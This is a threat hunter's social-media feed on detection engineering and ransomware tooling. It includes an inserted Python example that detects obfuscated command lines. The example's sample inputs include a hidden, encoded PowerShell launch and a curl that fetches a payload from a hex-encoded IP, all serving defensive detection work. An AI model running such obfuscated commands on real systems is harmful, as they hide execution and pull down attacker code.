mthcht
@mthcht.bsky.social
Threat Hunting - DFIR - Detection Engineering
🐙 https://github.com/mthcht
🐦 https://x.com/mthcht
📰 https://mthcht.medium.com
it used to be great...
April 2, 2025 at 8:25 PM
🎭 #ThreatHunting February updates 🎭
🐙 release: github.com/mthcht/Threa...
🌐 Site: mthcht.github.io/ThreatHuntin...
🧬 yara: github.com/mthcht/Threa...
🐾 Specific artifact lists: github.com/mthcht/aweso...
March 2, 2025 at 10:15 PM
It's growing! Now at 38 services and 82 projects 🙈 What's your favorite LoLC2?
February 19, 2025 at 6:44 PM
Path masquerading zerosalarium.com/2025/01/path...

Interesting technique, if you're hunting for this, you can directly search the unicode characters in Splunk 🥷
February 13, 2025 at 1:35 AM
Most SOCs handle hundreds to thousands of detection rules in their SIEM. Proper categorization is essential when creating a new detection, as it helps define criticality, urgency, implementation effort, and verbosity level. Keeping things structured will reduce alert fatigue!
February 12, 2025 at 2:07 AM
Hexadecimal IP Detection:

Identify the hexadecimal IP address format in command lines with a "simple" regex (some default behaviors to exclude)
February 9, 2025 at 7:06 PM
Special Characters Anomaly Detection:

This query extracts common special characters from the process command line, counts occurrences, calculates the ratio, and returns commands with more than 20% special characters in them; it could catch the quote insertion and URL transformer techniques
February 9, 2025 at 7:06 PM
#ThreatHunting ideas for detecting command-line obfuscation techniques from github.com/wietze/Invok... with Splunk!
(examples with EID 4688)

Mixed Case Randomization Detection:

This query counts uppercase/lowercase letters and returns command lines with a near-equal ratio
February 9, 2025 at 7:06 PM
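The three detections described in this thread (mixed-case ratio, special-character ratio, hexadecimal IP in the command line), re-implemented as an added example in Python over a few constructed EID 4688 command lines. This is not the author's code: the original queries are Splunk SPL and are not reproduced on this page. The thresholds (0.35 to 0.65 for "near-equal", 20% for special characters), the set of characters counted as "special", the exclusion of unspecified/loopback decoded addresses, and the sample lines are all assumptions chosen for illustration; in Splunk the same logic would be expressed in SPL against the CommandLine field with the exclusions tuned to the environment.

```python
import ipaddress
import re

# Constructed sample command lines (not real 4688 telemetry), one per technique
SAMPLE_CMDLINES = [
    r'C:\Windows\System32\cmd.exe /c dir C:\Users',          # benign baseline
    r'PoWeRsHeLL.exe -NoP -w HiDdEn -eNc SQBFAFgA',           # mixed-case randomization
    r'cmd.exe /c "e""c""h""o" "h""e""l""l""o" > out.txt',     # quote insertion
    r'ping.exe 0xC0A80101',                                   # 32-bit hex IP
    r'curl.exe http://0xC0.0xA8.0x01.0x01/payload',           # dotted hex IP
]

# Assumption: characters that are rare in normal command lines. '-', '/', ':', '.'
# and '\' are deliberately left out because they appear in almost every command.
SPECIAL_CHARS = set('"\'^`,;(){}[]$%|&<>+=@!~*?')

# Assumption: the two hex-IP shapes most often seen in obfuscated tooling.
HEX_DOTTED_RE = re.compile(r'\b0[xX][0-9A-Fa-f]{1,2}(?:\.0[xX][0-9A-Fa-f]{1,2}){3}\b')
HEX_32BIT_RE = re.compile(r'\b0[xX][0-9A-Fa-f]{8}\b')


def mixed_case_ratio(cmd: str) -> float:
    """Share of letters that are uppercase (0.0 when there are no letters)."""
    upper = sum(1 for c in cmd if c.isupper())
    lower = sum(1 for c in cmd if c.islower())
    total = upper + lower
    return upper / total if total else 0.0


def is_mixed_case(cmd: str, min_letters: int = 8, low: float = 0.35, high: float = 0.65) -> bool:
    """Flag command lines whose upper/lower split is near-equal.

    min_letters avoids flagging very short commands where a 50/50 split is noise.
    """
    letters = sum(1 for c in cmd if c.isalpha())
    if letters < min_letters:
        return False
    return low <= mixed_case_ratio(cmd) <= high


def special_char_ratio(cmd: str) -> float:
    """Fraction of the whole command line (whitespace included) made of SPECIAL_CHARS."""
    if not cmd:
        return 0.0
    specials = sum(1 for c in cmd if c in SPECIAL_CHARS)
    return specials / len(cmd)


def hex_ips(cmd: str) -> list:
    """Return decoded dotted-quad strings for every hex-encoded IPv4 in the command line.

    Unspecified (0.0.0.0) and loopback results are dropped as a constructed example
    of the "default behaviors to exclude"; real environments will need their own list.
    """
    found = []
    for m in HEX_DOTTED_RE.finditer(cmd):
        octets = [int(part, 16) for part in m.group(0).split('.')]
        found.append(ipaddress.IPv4Address('.'.join(str(o) for o in octets)))
    for m in HEX_32BIT_RE.finditer(cmd):
        found.append(ipaddress.IPv4Address(int(m.group(0), 16)))
    return [str(a) for a in found if not (a.is_unspecified or a.is_loopback)]


def hunt(cmdlines, special_threshold: float = 0.20):
    """Run all three detections; return (command line, triggered techniques, decoded IPs)."""
    results = []
    for cmd in cmdlines:
        hits = []
        if is_mixed_case(cmd):
            hits.append('mixed_case')
        if special_char_ratio(cmd) > special_threshold:
            hits.append('special_chars')
        ips = hex_ips(cmd)
        if ips:
            hits.append('hex_ip')
        if hits:
            results.append((cmd, hits, ips))
    return results


if __name__ == '__main__':
    for cmd, hits, ips in hunt(SAMPLE_CMDLINES):
        print(f'{hits} {ips} :: {cmd}')
```

Each function returns the value a SPL `eval` would compute for one event, so the thresholds can be tuned on a baseline of known-good 4688 events before the logic is moved into the SIEM.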
I have a list of NS used for sinkhole domains and seized servers: raw.githubusercontent.com/mthcht/awesome…
I'm searching for the domains, on my server I can resolve a record type for ~400 million domains per day with github.com/blechschmidt/m… 😃 Massive improvement compared to other solutions!
February 9, 2025 at 7:01 PM
❄️ #ThreatHunting December + January updates ❄️
🐙 release: github.com/mthcht/Threa...
🌐 Site: mthcht.github.io/ThreatHuntin...
🧬 yara: github.com/mthcht/Threa...
🐾 Specific artifact lists: github.com/mthcht/aweso...
January 29, 2025 at 8:54 AM
I like these Threat Profiles pages! grab the IOCs, cross-check with your database, kick off a quick hunt 👌
app.validin.com
January 28, 2025 at 5:28 PM
I made a Windows #DFIR artifact collection MindMap, it's tough to fit everything into a readable overview (might change later)
January 4, 2025 at 11:50 PM
I just pushed a huge update to the project with 5,000 new reports, bringing the total to over 16,000! The next one’s going to be massive too!
December 18, 2024 at 7:14 PM
Pretty sure not many are hunting for VM tool usage. This persistence technique, used by Ragnar Locker ransomware, deserves more attention from defenders: embracethered.com/blog/shadowb...
December 15, 2024 at 2:28 PM
My intelligence-gathering sheet for planning #ThreatHunting sessions
December 9, 2024 at 10:44 AM
Knowledge is power!
Prepare your #ThreatHunting sessions by gathering intelligence reports on specific topics - could be tools, patterns, or threat actor groups
🏛️ mthcht.github.io/ThreatIntel-...
Now featuring more than 1,000 search results in over 11,000 Intelligence Reports updated regularly!
December 9, 2024 at 1:12 AM
On the hunt for all the tools this ransomware group used 🔭
December 8, 2024 at 2:57 PM
Apparently, this is a thing 🤔 the legit Ookla speedtest.exe downloaded and executed by Dagon Locker and Dispossesor ransomware group (as far as I know) for network assessment
December 4, 2024 at 11:36 PM
Great training materials available here:
github.com/mthcht/aweso...
November 18, 2024 at 9:45 PM
A regex to hunt for this phishing pattern in the file_path field with Splunk 🔎
November 18, 2024 at 7:26 PM
November 10, 2024 at 6:20 AM